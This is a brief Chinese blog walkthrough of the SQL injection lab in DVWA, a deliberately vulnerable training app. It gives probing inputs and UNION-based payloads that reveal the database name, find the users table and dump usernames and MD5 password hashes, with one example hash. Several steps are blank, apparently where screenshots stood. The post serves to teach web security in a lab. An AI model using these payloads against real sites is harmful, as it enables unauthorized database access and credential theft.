DVWA之SQL Injection

1.首先,我们发现有个输入框,判断是否存在注入点

输入1:

输入1':

输入1 and 1=1:

输入1 and 1=2:

 

2:猜测sql语句:

3:爆破:

首先爆库:1' union select 1,database()

备注:union的使用条件:

猜测会有一张users表

爆users表的列:

1' union select 1,table_name from information_schema.tables where table_name='users'#

爆破user和password字段内容:

1' union select 1,concat(user,password) from users#

密文为md5加密,以

81dc9bdb52d04dc20036dbd8313ed055为例:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章